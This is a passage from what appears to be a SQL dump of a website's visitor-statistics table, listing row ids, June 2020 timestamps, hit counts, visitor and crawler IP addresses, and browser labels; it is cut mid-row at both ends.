109.74.154.72','chrome'),(514833,1592477523,1,1,0,0,'66.249.64.36','chrome'),(514834,1592477656,1,1,0,0,'178.154.200.49','other'),(514835,1592477692,1,1,0,0,'91.196.178.122','other'),(514836,1592477814,2,2,0,0,'178.255.72.122','chrome'),(514837,1592477825,1,1,0,0,'91.209.11.236','other'),(514838,1592477859,1,1,0,0,'87.236.20.165','chrome'),(514839,1592478387,1,1,0,0,'66.249.70.70','chrome'),(514840,1592478554,1,1,0,0,'173.252.111.14','other'),(514841,1592478555,1,1,0,0,'173.252.111.10','other'),(514843,1592479226,8,8,0,0,'185.11.82.228','other'),(514844,1592479329,1,1,0,0,'66.249.64.33','chrome'),(514845,1592479396,1,1,0,0,'78.108.92.76','chrome'),(514846,1592479484,2,2,0,0,'66.249.70.72','chrome'),(514847,1592479760,1,1,0,0,'66.249.64.36','chrome'),(514848,1592479768,1,1,0,0,'91.196.178.21','chrome'),(514849,1592479825,1,1,0,0,'194.61.24.94','other'),(514850,1592480578,3,3,0,0,'66.249.64.33','chrome'),(514851,1592481070,1,1,0,0,'66.249.70.72','chrome'),(514852,1592481093,2,2,0,0,'157.55.39.52','other'),(514853,1592481339,1,1,0,0,'207.46.13.214','other'),(514854,1592481711,8,8,0,0,'185.11.82.228','other'),(514855,1592482048,1,1,0,0,'173.252.111.119','other'),(514856,1592482049,1,1,0,0,'173.252.111.9','other'),(514857,1592482261,1,1,0,0,'66.249.70.72','chrome'),(514858,1592482402,1,1,0,0,'207.46.13.214','other'),(514859,1592482411,2,2,0,0,'66.249.70.69','chrome'),(514860,1592482760,1,1,0,0,'213.180.203.122','other'),(514861,1592483674,1,1,0,0,'66.249.70.69','chrome'),(514862,1592483815,4,4,0,0,'37.17.224.121','chrome'),(514863,1592483846,1,1,0,0,'66.249.70.72','chrome'),(514864,1592484141,2,2,0,0,'157.55.39.52','other'),(514865,1592484305,1,1,0,0,'66.249.70.70','chrome'),(514866,1592484343,1,1,0,0,'66.249.64.38','chrome'),(514867,1592484461,8,8,0,0,'185.11.82.228','other'),(514868,1592484715,1,1,0,0,'207.46.13.214','other'),(514869,1592485052,1,1,0,0,'37.53.89.92','chrome'),(514870,1592485318,1,1,0,0,'88.155.50.123','chrome'),(514871,1592485423,2,2,0,0,'66.249.70.72','chrome'),(514872,1592487377,1,1,0,0,'178.154.200.220','other'),(514873,1592487434,2,2,0,0,'8.29.198.25','other'),(514874,1592487788,1,1,0,0,'66.249.70.69','chrome'),(514875,1592487915,2,2,0,0,'66.249.70.72','chrome'),(514876,1592487975,1,1,0,0,'185.21.177.20','chrome'),(514877,1592488326,1,1,0,0,'66.249.68.8','chrome'),(514878,1592488487,8,8,0,0,'185.11.82.228','other'),(514879,1592488537,2,2,0,0,'66.249.70.70','chrome'),(514880,1592488858,3,3,0,0,'66.249.70.72','chrome'),(514881,1592489097,1,1,0,0,'176.105.215.87','chrome'),(514882,1592489515,1,1,0,0,'207.46.13.214','other'),(514883,1592489567,3,3,0,0,'66.249.70.69','chrome'),(514884,1592489676,2,2,0,0,'66.249.70.70','chrome'),(514885,1592490121,1,1,0,0,'178.154.200.220','other'),(514886,1592490437,1,1,0,0,'66.249.70.72','chrome'),(514887,1592490963,1,1,0,0,'91.196.178.21','chrome'),(514888,1592491671,1,1,0,0,'37.52.22.9','other'),(514889,1592491721,1,1,0,0,'66.249.70.72','chrome'),(514890,1592492374,2,2,0,0,'207.46.13.214','other'),(514891,1592492802,2,2,0,0,'157.55.39.52','other'),(514892,1592493055,2,1,1,0,'66.249.70.69',''),(514893,1592493089,8,8,0,0,'185.11.82.228','other'),(514894,1592493093,1,1,0,0,'46.211.59.91','other'),(514895,1592493112,1,1,0,0,'66.249.64.33','chrome'),(514896,1592493122,1,1,0,0,'178.154.200.196','other'),(514897,1592493415,1,1,0,0,'66.249.70.72','chrome'),(514898,1592493554,1,1,0,0,'207.46.13.243','other'),(514899,1592493588,1,1,0,0,'91.193.131.114','firefox'),(514900,1592494431,2,2,0,0,'66.249.70.69','chrome'),(514901,1592494525,2,2,0,0,'157.55.39.52','other'),(514902,1592495364,1,1,0,0,'66.249.64.33','chrome'),(514903,1592495784,1,1,0,0,'178.154.200.236','other'),(514904,1592496792,1,1,0,0,'66.249.70.69','chrome'),(514905,1592496960,1,1,0,0,'66.249.70.70','chrome'),(514906,1592498216,2,2,0,0,'207.46.13.214','other'),(514907,1592498259,2,2,0,0,'8.29.198.26','other'),(514908,1592498312,8,8,0,0,'185.11.82.228','other'),(514909,1592499183,1,1,0,0,'66.249.70.70','chrome'),(514910,1592499447,1,1,0,0,'66.249.70.69','chrome'),(514911,1592499696,1,1,0,0,'188.68.240.242','chrome'),(514912,1592499758,1,1,0,0,'91.209.11.236','other'),(514913,1592500465,1,1,0,0,'178.154.200.92','other'),(514914,1592500821,1,1,0,0,'91.209.11.236','other'),(514915,1592501153,3,3,0,0,'66.249.70.72','chrome'),(514916,1592501171,3,3,0,0,'66.249.64.38','chrome'),(514917,1592501247,54,54,0,0,'149.56.151.65','other'),(514918,1592501325,13,13,0,0,'66.249.70.69','chrome'),(514919,1592501419,2,2,0,0,'66.249.64.36','chrome'),(514920,1592501717,4,4,0,0,'66.249.64.33','chrome'),(514921,1592501833,15,15,0,0,'66.249.70.70','chrome'),(514922,1592501836,1,1,0,0,'91.209.11.236','other'),(514923,1592501897,1,1,0,0,'157.55.39.52','other'),(514924,1592502195,5,5,0,0,'66.249.70.72','chrome'),(514925,1592502204,3,3,0,0,'66.249.64.38','chrome'),(514926,1592502260,21,21,0,0,'66.249.70.69','chrome'),(514927,1592502437,1,1,0,0,'95.158.53.6','chrome'),(514928,1592502458,2,2,0,0,'66.249.64.36','chrome'),(514929,1592502784,1,1,0,0,'91.209.11.236','other'),(514930,1592503060,2,2,0,0,'66.249.70.70','chrome'),(514931,1592503565,1,1,0,0,'207.46.13.214','other'),(514932,1592503714,1,1,0,0,'91.209.11.236','other'),(514933,1592503985,3,3,0,0,'66.249.70.70','chrome'),(514934,1592504046,1,0,1,0,'66.249.70.72',''),(514935,1592504058,2,2,0,0,'66.249.64.36','chrome'),(514936,1592504293,8,8,0,0,'185.11.82.228','other'),(514937,1592504353,1,1,0,0,'66.249.70.72','chrome'),(514938,1592504629,2,2,0,0,'66.249.70.69','chrome'),(514939,1592504710,1,1,0,0,'207.46.13.243','other'),(514940,1592504724,1,1,0,0,'91.209.11.236','other'),(514941,1592504948,1,1,0,0,'91.196.178.21','chrome'),(514942,1592505581,1,1,0,0,'207.46.13.214','other'),(514943,1592505640,1,1,0,0,'91.209.11.236','other'),(514944,1592506235,2,2,0,0,'66.249.70.69','chrome'),(514945,1592506408,2,2,0,0,'66.249.70.70','chrome'),(514946,1592506839,3,3,0,0,'66.249.70.72','chrome'),(514947,1592506911,1,1,0,0,'91.209.11.236','other'),(514948,1592507399,3,3,0,0,'66.249.70.70','chrome'),(514949,1592508052,1,1,0,0,'66.249.64.36','chrome'),(514950,1592508096,1,1,0,0,'66.249.64.38','chrome'),(514951,1592508712,1,1,0,0,'91.209.11.236','other'),(514952,1592508732,1,1,0,0,'54.36.149.105','other'),(514953,1592508817,1,1,0,0,'213.180.203.14','other'),(514954,1592508863,1,1,0,0,'157.55.39.52','other'),(514955,1592508903,2,2,0,0,'207.46.13.243','other'),(514956,1592508984,1,1,0,0,'66.249.64.33','chrome'),(514957,1592509086,2,2,0,0,'8.29.198.25','other'),(514958,1592509192,1,1,0,0,'66.249.70.72','chrome'),(514959,1592509447,1,1,0,0,'66.249.70.69','chrome'),(514960,1592509581,1,1,0,0,'89.163.242.241','opera'),(514961,1592509862,1,1,0,0,'91.209.11.236','other'),(514962,1592510361,1,1,0,0,'66.249.64.38','chrome'),(514963,1592510513,1,1,0,0,'207.46.13.214','other'),(514964,1592510630,2,2,0,0,'157.55.39.52','other'),(514965,1592510733,8,8,0,0,'185.11.82.228','other'),(514966,1592510998,3,3,0,0,'66.249.70.70','chrome'),(514967,1592511043,1,1,0,0,'31.13.127.10','other'),(514968,1592511044,1,1,0,0,'31.13.127.17','other'),(514970,1592511162,1,1,0,0,'66.249.70.72','chrome'),(514971,1592511505,1,1,0,0,'66.249.64.36','chrome'),(514972,1592511765,1,1,0,0,'91.209.11.236','other'),(514973,1592512578,2,2,0,0,'66.249.70.69','chrome'),(514974,1592512618,1,1,0,0,'157.55.39.52','other'),(514975,1592512792,1,1,0,0,'91.209.11.236','other'),(514976,1592512881,1,1,0,0,'193.106.30.99','chrome'),(514977,1592513610,2,2,0,0,'66.249.70.69','chrome'),(514978,1592513850,1,1,0,0,'91.209.11.236','other'),(514979,1592514128,2,2,0,0,'207.46.13.243','other'),(514980,1592514557,1,1,0,0,'178.154.200.222','other'),(514981,1592515307,1,1,0,0,'66.249.70.70','chrome'),(514982,1592516009,1,1,0,0,'91.209.11.236','other'),(514983,1592516797,1,1,0,0,'66.249.70.69','chrome'),(514984,1592517066,1,1,0,0,'91.209.11.236','other'),(514985,1592517563,8,8,0,0,'185.11.82.228','other'),(514986,1592517622,1,1,0,0,'13.66.139.0','other'),(514987,1592517714,1,1,0,0,'66.249.70.70','chrome'),(514988,1592518039,2,2,0,0,'66.249.70.69','chrome'),(514989,1592518185,1,1,0,0,'91.209.11.236','other'),(514990,1592518360,1,1,0,0,'157.55.39.52','other'),(514991,1592519327,1,1,0,0,'91.209.11.236','other'),(514992,1592519914,2,2,0,0,'8.29.198.25','other'),(514993,1592520233,1,1,0,0,'66.249.70.69','chrome'),(514994,1592520331,1,1,0,0,'66.249.64.36','chrome'),(514995,1592520465,1,1,0,0,'91.209.11.236','other'),(514996,1592521190,1,1,0,0,'207.46.13.243','other'),(514997,1592521709,1,1,0,0,'91.209.11.236','other'),(514998,1592521721,1,1,0,0,'66.249.70.70','chrome'),(514999,1592521874,2,2,0,0,'66.249.70.72','chrome'),(515000,1592522101,1,1,0,0,'66.249.70.69','chrome'),(515001,1592522364,1,1,0,0,'51.77.52.160','chrome'),(515002,1592522705,1,1,0,0,'91.209.11.236','other'),(515003,1592523117,1,1,0,0,'66.249.70.69','chrome'),(515004,1592523480,1,1,0,0,'37.53.227.178','chrome'),(515005,1592523622,1,1,0,0,'209.17.96.90','other'),(515006,1592523642,1,1,0,0,'213.180.203.95','other'),(515007,1592523897,1,1,0,0,'91.209.11.236','other'),(515008,1592524506,1,1,0,0,'62.205.134.182','other'),(515009,1592525046,1,1,0,0,'66.249.64.36','chrome'),(515010,1592525384,2,2,0,0,'91.209.11.236','other'),(515011,1592525495,2,2,0,0,'66.249.70.69','chrome'),(515012,1592525658,1,1,0,0,'2.94.202.22','other'),(515013,1592526955,3,3,0,0,'66.249.70.72','chrome'),(515014,1592527132,2,2,0,0,'66.249.70.70','chrome'),(515015,1592527209,1,1,0,0,'66.249.70.69','chrome'),(515016,1592527415,1,1,0,0,'91.209.11.236','other'),(515017,1592527810,2,2,0,0,'66.249.64.38','chrome'),(515018,1592527836,1,1,0,0,'178.154.200.22','other'),(515019,1592528086,1,1,0,0,'66.249.70.70','chrome'),(515020,1592528448,2,2,0,0,'66.249.70.72','chrome'),(515021,1592528625,1,1,0,0,'91.209.11.236','other'),(515022,1592528750,1,1,0,0,'157.55.39.52','other'),(515023,1592529115,1,1,0,0,'66.249.64.38','chrome'),(515024,1592529852,1,1,0,0,'91.209.11.236','other'),(515025,1592529887,1,1,0,0,'66.249.70.69','chrome'),(515026,1592530425,3,3,0,0,'66.249.70.72','chrome'),(515027,1592530516,1,1,0,0,'178.154.200.222','other'),(515028,1592530737,2,2,0,0,'8.29.198.26','other'),(515029,1592530825,2,2,0,0,'66.249.70.69','chrome'),(515030,1592531135,1,1,0,0,'91.209.11.236','other'),(515031,1592531411,1,1,0,0,'66.249.64.38','chrome'),(515032,1592531978,1,1,0,0,'157.55.39.52','other'),(515033,1592532400,1,1,0,0,'91.209.11.236','other'),(515034,1592532538,1,1,0,0,'66.249.70.69','chrome'),(515035,1592533516,1,1,0,0,'91.209.11.236','other'),(515036,1592534080,2,2,0,0,'66.249.70.70','chrome'),(515037,1592534310,1,1,0,0,'66.249.70.72','chrome'),(515038,1592534495,2,1,1,0,'66.249.70.69',''),(515039,1592534831,1,1,0,0,'91.209.11.236','other'),(515040,1592535006,1,1,0,0,'66.249.70.70','chrome'),(515041,1592535074,1,1,0,0,'66.249.64.36','chrome'),(515042,1592535230,1,1,0,0,'66.249.70.72','chrome'),(515043,1592535649,1,1,0,0,'52.188.147.103','chrome'),(515044,1592536142,2,1,1,0,'66.249.70.69',''),(515045,1592537229,2,2,0,0,'66.249.70.72','chrome'),(515046,1592537259,1,1,0,0,'66.249.64.38','chrome'),(515047,1592537314,4,4,0,0,'66.249.70.70','chrome'),(515048,1592537334,6,6,0,0,'66.249.70.69','chrome'),(515049,1592537393,1,1,0,0,'91.209.11.236','other'),(515050,1592537878,1,1,0,0,'207.46.13.243','other'),(515051,1592538433,2,2,0,0,'66.249.70.70','chrome'),(515052,1592538440,11,11,0,0,'66.249.70.69','chrome'),(515053,1592538544,2,2,0,0,'66.249.64.36','chrome'),(515054,1592538631,1,1,0,0,'91.209.11.236','other'),(515055,1592538634,1,1,0,0,'66.249.70.72','chrome'),(515056,1592538882,1,1,0,0,'66.249.64.38','chrome'),(515057,1592539284,1,1,0,0,'66.249.64.33','chrome'),(515058,1592539339,8,8,0,0,'185.11.82.228','other'),(515059,1592539614,1,1,0,0,'157.55.39.52','other'),(515060,1592539679,1,1,0,0,'91.209.11.236','other'),(515061,1592539913,1,1,0,0,'207.46.13.243','other'),(515062,1592540178,1,1,0,0,'66.249.70.69','chrome'),(515063,1592540792,1,1,0,0,'66.249.70.72','chrome'),(515064,1592541426,4,4,0,0,'66.249.70.69','chrome'),(515065,1592541566,2,2,0,0,'8.29.198.25','other'),(515066,1592541572,1,1,0,0,'66.249.70.70','chrome'),(515067,1592541734,1,1,0,0,'91.209.11.236','other'),(515068,1592542341,1,1,0,0,'62.205.134.182','other'),(515069,1592542564,1,1,0,0,'66.249.70.69','chrome'),(515070,1592542699,1,1,0,0,'91.209.11.236','other'),(515071,1592543448,1,1,0,0,'31.134.211.63','chrome'),(515072,1592543540,1,1,0,0,'167.99.81.238','chrome'),(515073,1592543699,1,1,0,0,'91.209.11.236','other'),(515074,1592543729,1,1,0,0,'66.249.70.69','chrome'),(515075,1592543905,1,1,0,0,'66.249.70.72','chrome'),(515076,1592544085,2,2,0,0,'66.249.64.33','chrome'),(515077,1592544508,1,1,0,0,'66.249.70.70','chrome'),(515078,1592545654,1,1,0,0,'66.249.70.69','chrome'),(515079,1592545688,1,1,0,0,'91.209.11.236','other'),(515080,1592545862,1,1,0,0,'157.55.39.52','other'),(515081,1592546124,1,1,0,0,'62.173.145.180','chrome'),(515082,1592546191,1,1,0,0,'108.175.9.28','chrome'),(515083,1592546447,1,1,0,0,'31.13.127.111','other'),(515084,1592546448,1,1,0,0,'31.13.127.1','other'),(515085,1592546449,2,2,0,0,'31.13.127.4','other'),(515087,1592546462,1,1,0,0,'31.13.127.117','other'),(515088,1592546525,1,1,0,0,'31.13.127.112','other'),(515089,1592546688,1,1,0,0,'66.249.70.72','chrome'),(515090,1592546712,1,1,0,0,'91.209.11.236','other'),(515091,1592546971,17,17,0,0,'66.249.70.69','chrome'),(515092,1592547045,1,1,0,0,'207.46.13.243','other'),(515093,1592547054,1,1,0,0,'66.249.64.38','chrome'),(515094,1592547117,2,2,0,0,'66.249.70.70','chrome'),(515095,1592547490,4,4,0,0,'66.249.64.36','chrome'),(515096,1592547491,2,2,0,0,'91.227.16.127','chrome'),(515097,1592547518,3,3,0,0,'66.249.64.33','chrome'),(515098,1592547673,4,4,0,0,'66.249.70.72','chrome'),(515099,1592547777,1,1,0,0,'91.209.11.236','other'),(515100,1592548098,7,7,0,0,'66.249.70.70','chrome'),(515101,1592548171,22,22,0,0,'66.249.70.69','chrome'),(515102,1592548504,4,4,0,0,'66.249.64.33','chrome'),(515103,1592548619,3,3,0,0,'66.249.64.36','chrome'),(515104,1592548693,2,2,0,0,'66.249.70.72','chrome'),(515105,1592548776,2,2,0,0,'92.53.96.119','chrome'),(515106,1592548886,2,2,0,0,'51.68.11.215','chrome'),(515107,1592549132,1,1,0,0,'66.249.70.70','chrome'),(515108,1592549876,1,1,0,0,'157.55.39.52','other'),(515109,1592549918,1,1,0,0,'91.209.11.236','other'),(515110,1592550211,1,1,0,0,'66.249.64.36','chrome'),(515111,1592550225,2,2,0,0,'46.30.40.91','chrome'),(515112,1592550305,1,1,0,0,'185.10.99.21','chrome'),(515113,1592550639,3,3,0,0,'185.30.202.79','chrome'),(515114,1592551538,1,1,0,0,'66.249.64.38','chrome'),(515115,1592551555,2,2,0,0,'157.55.39.52','other'),(515116,1592551559,1,1,0,0,'207.46.13.243','other'),(515117,1592551565,1,1,0,0,'207.46.13.214','other'),(515118,1592551775,1,1,0,0,'66.249.70.72','chrome'),(515119,1592552181,1,1,0,0,'131.220.6.152','chrome'),(515120,1592552389,1,1,0,0,'8.29.198.25','other'),(515121,1592552428,1,1,0,0,'8.29.198.26','other'),(515122,1592553141,1,1,0,0,'31.134.211.63','chrome'),(515123,1592553325,1,1,0,0,'185.126.218.220','chrome'),(515124,1592553386,1,1,0,0,'66.249.70.70','chrome'),(515125,1592554353,1,1,0,0,'66.249.70.72','chrome'),(515126,1592554524,1,1,0,0,'66.249.70.69','chrome'),(515127,1592555723,1,1,0,0,'207.46.13.214','other'),(515128,1592555843,1,1,0,0,'66.249.64.38','chrome'),(515129,1592555853,1,1,0,0,'95.46.163.251','chrome'),(515130,1592555883,1,1,0,0,'95.134.213.121','opera'),(515131,1592556446,1,1,0,0,'51.68.11.203','chrome'),(515132,1592556703,1,1,0,0,'85.25.177.199','chrome'),(515133,1592556902,1,1,0,0,'207.46.13.214','other'),(515134,1592557747,1,1,0,0,'178.154.200.97','other'),(515135,1592558037,1,1,0,0,'89.46.105.229','chrome'),(515136,1592558260,1,1,0,0,'66.249.70.72','chrome'),(515137,1592558687,1,1,0,0,'92.113.156.101','chrome'),(515138,1592558706,1,1,0,0,'178.154.200.222','other'),(515139,1592558816,1,1,0,0,'91.196.178.169','firefox'),(515140,1592558827,1,1,0,0,'91.209.11.236','other'),(515141,1592559069,1,1,0,0,'34.229.131.232','chrome'),(515142,1592559297,2,2,0,0,'66.249.70.72','chrome'),(515143,1592559451,1,1,0,0,'91.196.178.21','chrome'),(515144,1592559995,1,1,0,0,'91.209.11.236','other'),(515145,1592560534,1,1,0,0,'213.180.203.16','other'),(515146,1592560635,2,2,0,0,'66.249.70.69','chrome'),(515147,1592560865,1,1,0,0,'66.249.64.36','chrome'),(515148,1592561214,1,1,0,0,'91.209.11.236','other'),(515149,1592561334,2,2,0,0,'66.249.70.72','chrome'),(515150,1592561345,2,2,0,0,'35.247.153.104','chrome'),(515151,1592561470,2,2,0,0,'91.196.178.34','chrome'),(515152,1592561473,1,1,0,0,'66.249.64.33','chrome'),(515153,1592561543,1,1,0,0,'194.61.24.94','other'),(515154,1592561733,3,3,0,0,'66.147.238.141','chrome'),(515155,1592561754,1,1,0,0,'91.196.178.21','chrome'),(515156,1592561794,2,2,0,0,'157.55.39.137','other'),(515157,1592562044,1,1,0,0,'193.194.127.33','chrome'),(515158,1592562351,1,1,0,0,'91.209.11.236','other'),(515159,1592563104,1,1,0,0,'157.55.39.52','other'),(515160,1592563215,2,2,0,0,'8.29.198.26','other'),(515161,1592563585,1,1,0,0,'91.209.11.236','other'),(515162,1592563947,1,1,0,0,'109.74.154.72','chrome'),(515163,1592563979,1,1,0,0,'207.46.13.214','other'),(515164,1592564620,1,1,0,0,'198.38.82.11','chrome'),(515165,1592564671,3,3,0,0,'186.232.248.40','chrome'),(515166,1592564783,1,1,0,0,'91.209.11.236','other'),(515167,1592565399,1,1,0,0,'66.249.64.33','chrome'),(515168,1592565951,2,2,0,0,'195.34.207.21','chrome'),(515169,1592565991,1,1,0,0,'66.249.70.70','chrome'),(515170,1592566123,2,2,0,0,'192.198.92.114','chrome'),(515171,1592566216,2,2,0,0,'66.249.70.72','chrome'),(515172,1592566334,1,1,0,0,'157.55.39.52','other'),(515173,1592566816,1,1,0,0,'66.249.70.69','chrome'),(515174,1592567234,1,1,0,0,'91.209.11.236','other'),(515175,1592567363,1,0,1,0,'66.249.70.72',''),(515176,1592567434,2,2,0,0,'178.210.142.129','chrome'),(515177,1592567441,1,1,0,0,'178.208.83.18','chrome'),(515178,1592567503,1,1,0,0,'66.249.70.70','chrome'),(515179,1592567521,2,2,0,0,'91.208.99.2','chrome'),(515180,1592567626,2,2,0,0,'173.233.84.210','chrome'),(515181,1592567658,1,1,0,0,'91.196.178.21','chrome'),(515182,1592567660,1,1,0,0,'157.55.39.137','other'),(515183,1592567768,2,2,0,0,'207.46.13.243','other'),(515184,1592567771,1,1,0,0,'157.55.39.52','other'),(515185,1592568022,3,3,0,0,'66.249.70.69','chrome'),(515186,1592568067,1,1,0,0,'91.196.178.89','chrome'),(515187,1592568070,2,2,0,0,'66.249.70.72','chrome'),(515188,1592568149,3,3,0,0,'66.249.64.36','chrome'),(515189,1592568335,1,1,0,0,'213.180.203.16','other'),(515190,1592568439,1,1,0,0,'91.209.11.236','other'),(515191,1592568501,1,1,0,0,'66.249.70.70','chrome'),(515192,1592569046,3,3,0,0,'54.36.167.79','chrome'),(515193,1592569194,1,1,0,0,'207.46.13.214','other'),(515194,1592569291,1,1,0,0,'160.153.199.186','chrome'),(515195,1592569304,1,1,0,0,'3.220.157.99','chrome'),(515196,1592569470,1,1,0,0,'213.180.203.16','other'),(515197,1592569531,1,1,0,0,'207.46.13.243','other'),(515198,1592569679,1,1,0,0,'178.154.200.222','other'),(515199,1592569949,2,2,0,0,'66.249.70.69','chrome'),(515200,1592570005,1,1,0,0,'66.249.70.72','chrome'),(515201,1592570329,2,2,0,0,'157.55.39.137','other'),(515202,1592570938,4,4,0,0,'66.249.70.72','chrome'),(515203,1592570949,4,4,0,0,'66.249.64.36','chrome'),(515204,1592571186,3,3,0,0,'207.46.13.214','other'),(515205,1592571216,7,7,0,0,'66.249.70.69','chrome'),(515206,1592571219,7,7,0,0,'66.249.70.70','chrome'),(515207,1592571800,1,1,0,0,'91.196.178.131','firefox'),(515208,1592571908,1,1,0,0,'91.196.178.21','chrome'),(515209,1592572003,1,1,0,0,'157.55.39.52','other'),(515210,1592572039,1,1,0,0,'66.249.64.36','chrome'),(515211,1592572200,1,1,0,0,'66.249.64.33','chrome'),(515212,1592572203,2,2,0,0,'103.35.65.203','chrome'),(515213,1592572211,4,4,0,0,'66.249.70.72','chrome'),(515214,1592572245,3,3,0,0,'66.249.70.70','chrome'),(515215,1592572284,3,3,0,0,'66.249.70.69','chrome'),(515216,1592572307,1,1,0,0,'213.171.163.29','chrome'),(515217,1592572430,1,1,0,0,'156.230.21.102','chrome'),(515218,1592573007,1,1,0,0,'157.55.39.52','other'),(515219,1592573272,3,3,0,0,'66.249.64.33','chrome'),(515220,1592573284,2,2,0,0,'66.249.64.38','chrome'),(515221,1592573344,2,2,0,0,'66.249.70.72','chrome'),(515222,1592573400,13,13,0,0,'66.249.70.69','chrome'),(515223,1592573452,1,1,0,0,'207.46.13.243','other'),(515224,1592573555,6,6,0,0,'66.249.70.70','chrome'),(515225,1592573641,1,1,0,0,'91.209.11.236','other'),(515226,1592573643,1,1,0,0,'159.100.187.120','chrome'),(515227,1592573729,1,1,0,0,'160.153.155.32','chrome'),(515228,1592573781,1,1,0,0,'144.217.158.133','chrome'),(515229,1592574047,2,2,0,0,'8.29.198.27','other'),(515230,1592574308,2,2,0,0,'66.249.70.69','chrome'),(515231,1592574341,1,1,0,0,'66.249.64.36','chrome'),(515232,1592574436,1,1,0,0,'46.219.95.131','chrome'),(515233,1592574468,1,1,0,0,'66.249.70.70','chrome'),(515234,1592574669,1,1,0,0,'207.46.13.243','other'),(515235,1592575289,1,1,0,0,'52.206.118.20','chrome'),(515236,1592575372,2,2,0,0,'66.249.70.72','chrome'),(515237,1592575769,2,2,0,0,'66.249.70.69','chrome'),(515238,1592575784,1,1,0,0,'66.249.64.38','chrome'),(515239,1592575798,1,1,0,0,'66.249.64.36','chrome'),(515240,1592575862,1,1,0,0,'52.152.139.86','chrome'),(515241,1592576065,2,1,1,0,'66.249.70.70',''),(515242,1592576155,1,1,0,0,'37.55.227.171','chrome'),(515243,1592576379,2,2,0,0,'157.55.39.137','other'),(515244,1592576435,2,2,0,0,'66.249.64.33','chrome'),(515245,1592576659,2,2,0,0,'66.249.70.72','chrome'),(515246,1592576883,2,2,0,0,'91.196.178.185','chrome'),(515247,1592577098,2,2,0,0,'207.46.13.243','other'),(515248,1592577333,2,2,0,0,'66.249.70.70','chrome'),(515249,1592577366,1,1,0,0,'207.46.13.214','other'),(515250,1592577387,3,3,0,0,'66.249.70.69','chrome'),(515251,1592577572,5,5,0,0,'66.249.70.72','chrome'),(515252,1592577639,2,2,0,0,'66.249.64.33','chrome'),(515253,1592578015,2,2,0,0,'66.249.64.36','chrome'),(515254,1592578080,1,1,0,0,'213.180.203.16','other'),(515255,1592578161,2,2,0,0,'66.249.64.38','chrome'),(515256,1592578246,1,1,0,0,'66.249.70.70','chrome'),(515257,1592578543,2,2,0,0,'66.249.70.72','chrome'),(515258,1592578697,1,1,0,0,'144.217.158.133','chrome'),(515259,1592578984,3,3,0,0,'66.249.70.69','chrome'),(515260,1592579083,1,1,0,0,'198.38.82.11','chrome'),(515261,1592579330,3,3,0,0,'66.249.70.70','chrome'),(515262,1592579448,1,1,0,0,'37.73.132.20','chrome'),(515263,1592579517,2,2,0,0,'66.249.64.38','chrome'),(515264,1592579777,1,1,0,0,'40.80.152.98','chrome'),(515265,1592580145,1,1,0,0,'66.249.70.69','chrome'),(515266,1592580288,1,1,0,0,'213.180.203.16','other'),(515267,1592581660,2,2,0,0,'156.230.21.102','chrome'),(515268,1592581772,3,3,0,0,'157.55.39.52','other'),(515269,1592581854,1,1,0,0,'157.55.39.193','other'),(515270,1592581871,2,2,0,0,'91.208.99.2','chrome'),(515271,1592582238,1,1,0,0,'102.130.112.235','chrome'),(515272,1592582578,1,1,0,0,'193.106.30.99','chrome'),(515273,1592583025,1,1,0,0,'157.55.39.52','other'),(515274,1592583156,1,1,0,0,'157.55.39.193','other'),(515275,1592583159,1,1,0,0,'37.32.98.127','chrome'),(515276,1592583181,1,1,0,0,'157.55.39.137','other'),(515277,1592583490,1,1,0,0,'51.68.11.215','chrome'),(515278,1592583863,2,2,0,0,'66.249.70.72','chrome'),(515279,1592584019,1,1,0,0,'178.154.200.222','other'),(515280,1592584386,1,1,0,0,'66.249.70.69','chrome'),(515281,1592584539,1,1,0,0,'213.180.203.16','other'),(515282,1592584852,2,2,0,0,'154.90.68.54','chrome'),(515283,1592584878,1,1,0,0,'8.29.198.27','other'),(515284,1592584907,1,1,0,0,'8.29.198.25','other'),(515285,1592585051,1,1,0,0,'87.236.20.17','chrome'),(515286,1592585195,1,1,0,0,'157.55.39.137','other'),(515287,1592585755,1,1,0,0,'154.51.131.142','chrome'),(515288,1592586050,1,1,0,0,'157.55.39.52','other'),(515289,1592586187,1,1,0,0,'157.55.39.193','other'),(515290,1592587252,2,2,0,0,'207.46.13.214','other'),(515291,1592587661,1,1,0,0,'66.249.64.36','chrome'),(515292,1592588058,3,3,0,0,'91.208.99.2','chrome'),(515293,1592588299,1,1,0,0,'93.159.230.28','chrome'),(515294,1592589127,1,1,0,0,'157.55.39.137','other'),(515295,1592589414,2,2,0,0,'178.154.200.222','other'),(515296,1592589551,1,1,0,0,'85.25.177.199','chrome'),(515297,1592589649,1,1,0,0,'66.249.64.38','chrome'),(515298,1592589947,2,2,0,0,'81.2.195.180','chrome'),(515299,1592590155,1,1,0,0,'66.249.70.69','chrome'),(515300,1592590491,8,8,0,0,'185.11.82.228','other'),(515301,1592590568,8,8,0,0,'77.120.98.235','other'),(515302,1592590583,1,1,0,0,'157.55.39.52','other'),(515303,1592591471,2,2,0,0,'66.249.70.69','chrome'),(515304,1592591745,2,2,0,0,'66.249.64.38','chrome'),(515305,1592592075,1,1,0,0,'178.154.200.22','other'),(515306,1592592102,8,8,0,0,'185.11.82.228','other'),(515307,1592592108,8,8,0,0,'77.120.98.235','other'),(515308,1592592658,1,1,0,0,'52.1.91.140','chrome'),(515309,1592592969,1,1,0,0,'157.55.39.193','other'),(515310,1592593136,1,1,0,0,'66.249.64.36','chrome'),(515311,1592593330,1,1,0,0,'66.249.64.38','chrome'),(515312,1592593386,1,1,0,0,'178.154.200.222','other'),(515313,1592593531,8,8,0,0,'185.11.82.228','other'),(515314,1592593653,8,8,0,0,'77.120.98.235','other'),(515315,1592593736,1,1,0,0,'66.249.70.69','chrome'),(515316,1592594176,1,1,0,0,'178.154.200.196','other'),(515317,1592594648,1,1,0,0,'66.249.70.70','chrome'),(515318,1592594674,2,2,0,0,'173.252.111.112','other'),(515319,1592594675,2,2,0,0,'173.252.111.12','other'),(515321,1592594892,8,8,0,0,'185.11.82.228','other'),(515322,1592594931,3,3,0,0,'66.249.70.72','chrome'),(515323,1592595101,8,8,0,0,'77.120.98.235','other'),(515324,1592595423,1,1,0,0,'31.13.103.4','other'),(515325,1592595424,2,2,0,0,'31.13.103.22','other'),(515326,1592595427,1,1,0,0,'31.13.103.116','other'),(515327,1592595439,1,1,0,0,'31.13.127.12','other'),(515328,1592595440,1,1,0,0,'31.13.127.14','other'),(515330,1592595706,1,1,0,0,'8.29.198.26','other'),(515331,1592595721,1,1,0,0,'178.208.83.57','chrome'),(515332,1592595732,1,1,0,0,'8.29.198.25','other'),(515333,1592595867,1,1,0,0,'85.25.237.25','chrome'),(515334,1592595957,1,1,0,0,'178.154.200.92','other'),(515335,1592596271